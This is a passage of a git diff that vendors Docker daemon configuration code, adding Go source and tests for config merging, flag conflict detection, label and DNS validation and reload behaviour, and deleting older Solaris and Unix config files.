+	f.Write([]byte(`{"Debug": tru`))
+	f.Close()
+
+	_, err = MergeDaemonConfigurations(&Config{}, nil, configFile)
+	if err == nil {
+		t.Fatalf("expected error, got %v", err)
+	}
+}
+
+func TestParseClusterAdvertiseSettings(t *testing.T) {
+	_, err := ParseClusterAdvertiseSettings("something", "")
+	if err != discovery.ErrDiscoveryDisabled {
+		t.Fatalf("expected discovery disabled error, got %v\n", err)
+	}
+
+	_, err = ParseClusterAdvertiseSettings("", "something")
+	if err == nil {
+		t.Fatalf("expected discovery store error, got %v\n", err)
+	}
+
+	_, err = ParseClusterAdvertiseSettings("etcd", "127.0.0.1:8080")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestFindConfigurationConflicts(t *testing.T) {
+	config := map[string]interface{}{"authorization-plugins": "foobar"}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	flags.String("authorization-plugins", "", "")
+	assert.Check(t, flags.Set("authorization-plugins", "asdf"))
+	assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "authorization-plugins: (from flag: asdf, from file: foobar)"))
+}
+
+func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) {
+	config := map[string]interface{}{"hosts": []string{"qwer"}}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	var hosts []string
+	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to")
+	assert.Check(t, flags.Set("host", "tcp://127.0.0.1:4444"))
+	assert.Check(t, flags.Set("host", "unix:///var/run/docker.sock"))
+	assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "hosts"))
+}
+
+func TestDaemonConfigurationMergeConflicts(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"debug": true}`))
+	f.Close()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.Bool("debug", false, "")
+	flags.Set("debug", "false")
+
+	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "debug") {
+		t.Fatalf("expected debug conflict, got %v", err)
+	}
+}
+
+func TestDaemonConfigurationMergeConcurrent(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"max-concurrent-downloads": 1}`))
+	f.Close()
+
+	_, err = MergeDaemonConfigurations(&Config{}, nil, configFile)
+	if err != nil {
+		t.Fatal("expected error, got nil")
+	}
+}
+
+func TestDaemonConfigurationMergeConcurrentError(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"max-concurrent-downloads": -1}`))
+	f.Close()
+
+	_, err = MergeDaemonConfigurations(&Config{}, nil, configFile)
+	if err == nil {
+		t.Fatalf("expected no error, got error %v", err)
+	}
+}
+
+func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`))
+	f.Close()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("tlscacert", "", "")
+	flags.Set("tlscacert", "~/.docker/ca.pem")
+
+	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "tlscacert") {
+		t.Fatalf("expected tlscacert conflict, got %v", err)
+	}
+}
+
+func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) {
+	config := map[string]interface{}{"tls-verify": "true"}
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	flags.Bool("tlsverify", false, "")
+	err := findConfigurationConflicts(config, flags)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") {
+		t.Fatalf("expected tls-verify conflict, got %v", err)
+	}
+}
+
+func TestFindConfigurationConflictsWithMergedValues(t *testing.T) {
+	var hosts []string
+	config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"}
+	flags := pflag.NewFlagSet("base", pflag.ContinueOnError)
+	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "")
+
+	err := findConfigurationConflicts(config, flags)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	flags.Set("host", "unix:///var/run/docker.sock")
+	err = findConfigurationConflicts(config, flags)
+	if err == nil {
+		t.Fatal("expected error, got nil")
+	}
+	if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") {
+		t.Fatalf("expected hosts conflict, got %v", err)
+	}
+}
+
+func TestValidateReservedNamespaceLabels(t *testing.T) {
+	for _, validLabels := range [][]string{
+		nil, // no error if there are no labels
+		{ // no error if there aren't any reserved namespace labels
+			"hello=world",
+			"label=me",
+		},
+		{ // only reserved namespaces that end with a dot are invalid
+			"com.dockerpsychnotreserved.label=value",
+			"io.dockerproject.not=reserved",
+			"org.docker.not=reserved",
+		},
+	} {
+		assert.Check(t, ValidateReservedNamespaceLabels(validLabels))
+	}
+
+	for _, invalidLabel := range []string{
+		"com.docker.feature=enabled",
+		"io.docker.configuration=0",
+		"org.dockerproject.setting=on",
+		// casing doesn't matter
+		"COM.docker.feature=enabled",
+		"io.DOCKER.CONFIGURATION=0",
+		"Org.Dockerproject.Setting=on",
+	} {
+		err := ValidateReservedNamespaceLabels([]string{
+			"valid=label",
+			invalidLabel,
+			"another=valid",
+		})
+		assert.Check(t, is.ErrorContains(err, invalidLabel))
+	}
+}
+
+func TestValidateConfigurationErrors(t *testing.T) {
+	minusNumber := -10
+	testCases := []struct {
+		config *Config
+	}{
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					Labels: []string{"one"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					Labels: []string{"foo=bar", "one"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNS: []string{"1.1.1.1o"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNS: []string{"2.2.2.2", "1.1.1.1o"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNSSearch: []string{"123456"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNSSearch: []string{"a.b.c", "123456"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					MaxConcurrentDownloads: &minusNumber,
+					// This is weird...
+					ValuesSet: map[string]interface{}{
+						"max-concurrent-downloads": -1,
+					},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					MaxConcurrentUploads: &minusNumber,
+					// This is weird...
+					ValuesSet: map[string]interface{}{
+						"max-concurrent-uploads": -1,
+					},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					NodeGenericResources: []string{"foo"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					NodeGenericResources: []string{"foo=bar", "foo=1"},
+				},
+			},
+		},
+	}
+	for _, tc := range testCases {
+		err := Validate(tc.config)
+		if err == nil {
+			t.Fatalf("expected error, got nil for config %v", tc.config)
+		}
+	}
+}
+
+func TestValidateConfiguration(t *testing.T) {
+	minusNumber := 4
+	testCases := []struct {
+		config *Config
+	}{
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					Labels: []string{"one=two"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNS: []string{"1.1.1.1"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					DNSSearch: []string{"a.b.c"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					MaxConcurrentDownloads: &minusNumber,
+					// This is weird...
+					ValuesSet: map[string]interface{}{
+						"max-concurrent-downloads": -1,
+					},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					MaxConcurrentUploads: &minusNumber,
+					// This is weird...
+					ValuesSet: map[string]interface{}{
+						"max-concurrent-uploads": -1,
+					},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					NodeGenericResources: []string{"foo=bar", "foo=baz"},
+				},
+			},
+		},
+		{
+			config: &Config{
+				CommonConfig: CommonConfig{
+					NodeGenericResources: []string{"foo=1"},
+				},
+			},
+		},
+	}
+	for _, tc := range testCases {
+		err := Validate(tc.config)
+		if err != nil {
+			t.Fatalf("expected no error, got error %v", err)
+		}
+	}
+}
+
+func TestModifiedDiscoverySettings(t *testing.T) {
+	cases := []struct {
+		current  *Config
+		modified *Config
+		expected bool
+	}{
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{}),
+			modified: discoveryConfig("foo", "bar", map[string]string{}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", map[string]string{}),
+			modified: discoveryConfig("foo", "bar", nil),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "bar", map[string]string{}),
+			expected: false,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("baz", "bar", nil),
+			expected: true,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "baz", nil),
+			expected: true,
+		},
+		{
+			current:  discoveryConfig("foo", "bar", nil),
+			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
+			expected: true,
+		},
+	}
+
+	for _, c := range cases {
+		got := ModifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts)
+		if c.expected != got {
+			t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified)
+		}
+	}
+}
+
+func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config {
+	return &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     backendAddr,
+			ClusterAdvertise: advertiseAddr,
+			ClusterOpts:      opts,
+		},
+	}
+}
+
+// TestReloadSetConfigFileNotExist tests that when `--config-file` is set
+// and it doesn't exist the `Reload` function returns an error.
+func TestReloadSetConfigFileNotExist(t *testing.T) {
+	configFile := "/tmp/blabla/not/exists/config.json"
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("config-file", "", "")
+	flags.Set("config-file", configFile)
+
+	err := Reload(configFile, flags, func(c *Config) {})
+	assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file"))
+}
+
+// TestReloadDefaultConfigNotExist tests that if the default configuration file
+// doesn't exist the daemon still will be reloaded.
+func TestReloadDefaultConfigNotExist(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	reloaded := false
+	configFile := "/etc/docker/daemon.json"
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("config-file", configFile, "")
+	err := Reload(configFile, flags, func(c *Config) {
+		reloaded = true
+	})
+	assert.Check(t, err)
+	assert.Check(t, reloaded)
+}
+
+// TestReloadBadDefaultConfig tests that when `--config-file` is not set
+// and the default configuration file exists and is bad return an error
+func TestReloadBadDefaultConfig(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+	f.Write([]byte(`{wrong: "configuration"}`))
+	f.Close()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("config-file", configFile, "")
+	err = Reload(configFile, flags, func(c *Config) {})
+	assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file"))
+}
+
+func TestReloadWithConflictingLabels(t *testing.T) {
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels":["foo=bar","foo=baz"]}`))
+	defer tempFile.Remove()
+	configFile := tempFile.Path()
+
+	var lbls []string
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("config-file", configFile, "")
+	flags.StringSlice("labels", lbls, "")
+	err := Reload(configFile, flags, func(c *Config) {})
+	assert.Check(t, is.ErrorContains(err, "conflict labels for foo=baz and foo=bar"))
+}
+
+func TestReloadWithDuplicateLabels(t *testing.T) {
+	tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels":["foo=the-same","foo=the-same"]}`))
+	defer tempFile.Remove()
+	configFile := tempFile.Path()
+
+	var lbls []string
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	flags.String("config-file", configFile, "")
+	flags.StringSlice("labels", lbls, "")
+	err := Reload(configFile, flags, func(c *Config) {})
+	assert.Check(t, err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix.go b/vendor/github.com/docker/docker/daemon/config/config_unix.go
new file mode 100644
index 0000000000..1970928f9b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_unix.go
@@ -0,0 +1,87 @@
+// +build linux freebsd
+
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"fmt"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/opts"
+	"github.com/docker/go-units"
+)
+
+const (
+	// DefaultIpcMode is default for container's IpcMode, if not set otherwise
+	DefaultIpcMode = "shareable" // TODO: change to private
+)
+
+// Config defines the configuration of a docker daemon.
+// It includes json tags to deserialize configuration from a file
+// using the same names that the flags in the command line uses.
+type Config struct {
+	CommonConfig
+
+	// These fields are common to all unix platforms.
+	CommonUnixConfig
+	// Fields below here are platform specific.
+	CgroupParent         string                   `json:"cgroup-parent,omitempty"`
+	EnableSelinuxSupport bool                     `json:"selinux-enabled,omitempty"`
+	RemappedRoot         string                   `json:"userns-remap,omitempty"`
+	Ulimits              map[string]*units.Ulimit `json:"default-ulimits,omitempty"`
+	CPURealtimePeriod    int64                    `json:"cpu-rt-period,omitempty"`
+	CPURealtimeRuntime   int64                    `json:"cpu-rt-runtime,omitempty"`
+	OOMScoreAdjust       int                      `json:"oom-score-adjust,omitempty"`
+	Init                 bool                     `json:"init,omitempty"`
+	InitPath             string                   `json:"init-path,omitempty"`
+	SeccompProfile       string                   `json:"seccomp-profile,omitempty"`
+	ShmSize              opts.MemBytes            `json:"default-shm-size,omitempty"`
+	NoNewPrivileges      bool                     `json:"no-new-privileges,omitempty"`
+	IpcMode              string                   `json:"default-ipc-mode,omitempty"`
+}
+
+// BridgeConfig stores all the bridge driver specific
+// configuration.
+type BridgeConfig struct {
+	commonBridgeConfig
+
+	// These fields are common to all unix platforms.
+	commonUnixBridgeConfig
+
+	// Fields below here are platform specific.
+	EnableIPv6          bool   `json:"ipv6,omitempty"`
+	EnableIPTables      bool   `json:"iptables,omitempty"`
+	EnableIPForward     bool   `json:"ip-forward,omitempty"`
+	EnableIPMasq        bool   `json:"ip-masq,omitempty"`
+	EnableUserlandProxy bool   `json:"userland-proxy,omitempty"`
+	UserlandProxyPath   string `json:"userland-proxy-path,omitempty"`
+	FixedCIDRv6         string `json:"fixed-cidr-v6,omitempty"`
+}
+
+// IsSwarmCompatible defines if swarm mode can be enabled in this config
+func (conf *Config) IsSwarmCompatible() error {
+	if conf.ClusterStore != "" || conf.ClusterAdvertise != "" {
+		return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode")
+	}
+	if conf.LiveRestoreEnabled {
+		return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode")
+	}
+	return nil
+}
+
+func verifyDefaultIpcMode(mode string) error {
+	const hint = "Use \"shareable\" or \"private\"."
+
+	dm := containertypes.IpcMode(mode)
+	if !dm.Valid() {
+		return fmt.Errorf("Default IPC mode setting (%v) is invalid. "+hint, dm)
+	}
+	if dm != "" && !dm.IsPrivate() && !dm.IsShareable() {
+		return fmt.Errorf("IPC mode \"%v\" is not supported as default value. "+hint, dm)
+	}
+	return nil
+}
+
+// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid.
+func (conf *Config) ValidatePlatformConfig() error {
+	return verifyDefaultIpcMode(conf.IpcMode)
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go
new file mode 100644
index 0000000000..529b677705
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go
@@ -0,0 +1,134 @@
+// +build !windows
+
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/opts"
+	"github.com/docker/go-units"
+	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+)
+
+func TestGetConflictFreeConfiguration(t *testing.T) {
+	configFileData := `
+		{
+			"debug": true,
+			"default-ulimits": {
+				"nofile": {
+					"Name": "nofile",
+					"Hard": 2048,
+					"Soft": 1024
+				}
+			},
+			"log-opts": {
+				"tag": "test_tag"
+			}
+		}`
+
+	file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData))
+	defer file.Remove()
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	var debug bool
+	flags.BoolVarP(&debug, "debug", "D", false, "")
+	flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "")
+	flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "")
+
+	cc, err := getConflictFreeConfiguration(file.Path(), flags)
+	assert.NilError(t, err)
+
+	assert.Check(t, cc.Debug)
+
+	expectedUlimits := map[string]*units.Ulimit{
+		"nofile": {
+			Name: "nofile",
+			Hard: 2048,
+			Soft: 1024,
+		},
+	}
+
+	assert.Check(t, is.DeepEqual(expectedUlimits, cc.Ulimits))
+}
+
+func TestDaemonConfigurationMerge(t *testing.T) {
+	configFileData := `
+		{
+			"debug": true,
+			"default-ulimits": {
+				"nofile": {
+					"Name": "nofile",
+					"Hard": 2048,
+					"Soft": 1024
+				}
+			},
+			"log-opts": {
+				"tag": "test_tag"
+			}
+		}`
+
+	file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData))
+	defer file.Remove()
+
+	c := &Config{
+		CommonConfig: CommonConfig{
+			AutoRestart: true,
+			LogConfig: LogConfig{
+				Type:   "syslog",
+				Config: map[string]string{"tag": "test"},
+			},
+		},
+	}
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+
+	var debug bool
+	flags.BoolVarP(&debug, "debug", "D", false, "")
+	flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "")
+	flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "")
+
+	cc, err := MergeDaemonConfigurations(c, flags, file.Path())
+	assert.NilError(t, err)
+
+	assert.Check(t, cc.Debug)
+	assert.Check(t, cc.AutoRestart)
+
+	expectedLogConfig := LogConfig{
+		Type:   "syslog",
+		Config: map[string]string{"tag": "test_tag"},
+	}
+
+	assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig))
+
+	expectedUlimits := map[string]*units.Ulimit{
+		"nofile": {
+			Name: "nofile",
+			Hard: 2048,
+			Soft: 1024,
+		},
+	}
+
+	assert.Check(t, is.DeepEqual(expectedUlimits, cc.Ulimits))
+}
+
+func TestDaemonConfigurationMergeShmSize(t *testing.T) {
+	data := `{"default-shm-size": "1g"}`
+
+	file := fs.NewFile(t, "docker-config", fs.WithContent(data))
+	defer file.Remove()
+
+	c := &Config{}
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	shmSize := opts.MemBytes(DefaultShmSize)
+	flags.Var(&shmSize, "default-shm-size", "")
+
+	cc, err := MergeDaemonConfigurations(c, flags, file.Path())
+	assert.NilError(t, err)
+
+	expectedValue := 1 * 1024 * 1024 * 1024
+	assert.Check(t, is.Equal(int64(expectedValue), cc.ShmSize.Value()))
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows.go b/vendor/github.com/docker/docker/daemon/config/config_windows.go
new file mode 100644
index 0000000000..0aa7d54bf2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_windows.go
@@ -0,0 +1,57 @@
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"github.com/docker/docker/api/types"
+)
+
+// BridgeConfig stores all the bridge driver specific
+// configuration.
+type BridgeConfig struct {
+	commonBridgeConfig
+}
+
+// Config defines the configuration of a docker daemon.
+// These are the configuration settings that you pass
+// to the docker daemon when you launch it with say: `dockerd -e windows`
+type Config struct {
+	CommonConfig
+
+	// Fields below here are platform specific. (There are none presently
+	// for the Windows daemon.)
+}
+
+// GetRuntime returns the runtime path and arguments for a given
+// runtime name
+func (conf *Config) GetRuntime(name string) *types.Runtime {
+	return nil
+}
+
+// GetInitPath returns the configure docker-init path
+func (conf *Config) GetInitPath() string {
+	return ""
+}
+
+// GetDefaultRuntimeName returns the current default runtime
+func (conf *Config) GetDefaultRuntimeName() string {
+	return StockRuntimeName
+}
+
+// GetAllRuntimes returns a copy of the runtimes map
+func (conf *Config) GetAllRuntimes() map[string]types.Runtime {
+	return map[string]types.Runtime{}
+}
+
+// GetExecRoot returns the user configured Exec-root
+func (conf *Config) GetExecRoot() string {
+	return ""
+}
+
+// IsSwarmCompatible defines if swarm mode can be enabled in this config
+func (conf *Config) IsSwarmCompatible() error {
+	return nil
+}
+
+// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid.
+func (conf *Config) ValidatePlatformConfig() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go
new file mode 100644
index 0000000000..09417ee388
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go
@@ -0,0 +1,60 @@
+// +build windows
+
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/opts"
+	"github.com/spf13/pflag"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDaemonConfigurationMerge(t *testing.T) {
+	f, err := ioutil.TempFile("", "docker-config-")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	configFile := f.Name()
+
+	f.Write([]byte(`
+		{
+			"debug": true,
+			"log-opts": {
+				"tag": "test_tag"
+			}
+		}`))
+
+	f.Close()
+
+	c := &Config{
+		CommonConfig: CommonConfig{
+			AutoRestart: true,
+			LogConfig: LogConfig{
+				Type:   "syslog",
+				Config: map[string]string{"tag": "test"},
+			},
+		},
+	}
+
+	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
+	var debug bool
+	flags.BoolVarP(&debug, "debug", "D", false, "")
+	flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "")
+
+	cc, err := MergeDaemonConfigurations(c, flags, configFile)
+	assert.NilError(t, err)
+
+	assert.Check(t, cc.Debug)
+	assert.Check(t, cc.AutoRestart)
+
+	expectedLogConfig := LogConfig{
+		Type:   "syslog",
+		Config: map[string]string{"tag": "test_tag"},
+	}
+
+	assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig))
+}
diff --git a/vendor/github.com/docker/docker/daemon/config/opts.go b/vendor/github.com/docker/docker/daemon/config/opts.go
new file mode 100644
index 0000000000..8b114929fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/config/opts.go
@@ -0,0 +1,22 @@
+package config // import "github.com/docker/docker/daemon/config"
+
+import (
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/convert"
+	"github.com/docker/swarmkit/api/genericresource"
+)
+
+// ParseGenericResources parses and validates the specified string as a list of GenericResource
+func ParseGenericResources(value []string) ([]swarm.GenericResource, error) {
+	if len(value) == 0 {
+		return nil, nil
+	}
+
+	resources, err := genericresource.Parse(value)
+	if err != nil {
+		return nil, err
+	}
+
+	obj := convert.GenericResourcesFromGRPC(resources)
+	return obj, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go
deleted file mode 100644
index ab76fe7b1b..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_common_unix.go
+++ /dev/null
@@ -1,90 +0,0 @@
-// +build solaris linux freebsd
-
-package daemon
-
-import (
-	"net"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/pflag"
-)
-
-// CommonUnixConfig defines configuration of a docker daemon that is
-// common across Unix platforms.
-type CommonUnixConfig struct {
-	ExecRoot       string                   `json:"exec-root,omitempty"`
-	ContainerdAddr string                   `json:"containerd,omitempty"`
-	Runtimes       map[string]types.Runtime `json:"runtimes,omitempty"`
-	DefaultRuntime string                   `json:"default-runtime,omitempty"`
-}
-
-type commonUnixBridgeConfig struct {
-	DefaultIP                   net.IP `json:"ip,omitempty"`
-	IP                          string `json:"bip,omitempty"`
-	DefaultGatewayIPv4          net.IP `json:"default-gateway,omitempty"`
-	DefaultGatewayIPv6          net.IP `json:"default-gateway-v6,omitempty"`
-	InterContainerCommunication bool   `json:"icc,omitempty"`
-}
-
-// InstallCommonUnixFlags adds command-line options to the top-level flag parser for
-// the current process that are common across Unix platforms.
-func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) {
-	config.Runtimes = make(map[string]types.Runtime)
-
-	flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket")
-	flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP")
-	flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge")
-	flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
-	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address")
-	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address")
-	flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication")
-	flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports")
-	flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime")
-	flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers")
-
-}
-
-// GetRuntime returns the runtime path and arguments for a given
-// runtime name
-func (config *Config) GetRuntime(name string) *types.Runtime {
-	config.reloadLock.Lock()
-	defer config.reloadLock.Unlock()
-	if rt, ok := config.Runtimes[name]; ok {
-		return &rt
-	}
-	return nil
-}
-
-// GetDefaultRuntimeName returns the current default runtime
-func (config *Config) GetDefaultRuntimeName() string {
-	config.reloadLock.Lock()
-	rt := config.DefaultRuntime
-	config.reloadLock.Unlock()
-
-	return rt
-}
-
-// GetAllRuntimes returns a copy of the runtimes map
-func (config *Config) GetAllRuntimes() map[string]types.Runtime {
-	config.reloadLock.Lock()
-	rts := config.Runtimes
-	config.reloadLock.Unlock()
-	return rts
-}
-
-// GetExecRoot returns the user configured Exec-root
-func (config *Config) GetExecRoot() string {
-	return config.ExecRoot
-}
-
-// GetInitPath returns the configure docker-init path
-func (config *Config) GetInitPath() string {
-	config.reloadLock.Lock()
-	defer config.reloadLock.Unlock()
-	if config.InitPath != "" {
-		return config.InitPath
-	}
-	return DefaultInitBinary
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go
deleted file mode 100644
index 963a51e5a3..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_experimental.go
+++ /dev/null
@@ -1,8 +0,0 @@
-package daemon
-
-import (
-	"github.com/spf13/pflag"
-)
-
-func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) {
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go
deleted file mode 100644
index bc18ccd7e4..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_solaris.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package daemon
-
-import (
-	"github.com/spf13/pflag"
-)
-
-var (
-	defaultPidFile = "/system/volatile/docker/docker.pid"
-	defaultGraph   = "/var/lib/docker"
-	defaultExec    = "zones"
-)
-
-// Config defines the configuration of a docker daemon.
-// These are the configuration settings that you pass
-// to the docker daemon when you launch it with say: `docker -d -e lxc`
-type Config struct {
-	CommonConfig
-
-	// These fields are common to all unix platforms.
-	CommonUnixConfig
-}
-
-// bridgeConfig stores all the bridge driver specific
-// configuration.
-type bridgeConfig struct {
-	commonBridgeConfig
-
-	// Fields below here are platform specific.
-	commonUnixBridgeConfig
-}
-
-// InstallFlags adds command-line options to the top-level flag parser for
-// the current process.
-func (config *Config) InstallFlags(flags *pflag.FlagSet) {
-	// First handle install flags which are consistent cross-platform
-	config.InstallCommonFlags(flags)
-
-	// Then install flags common to unix platforms
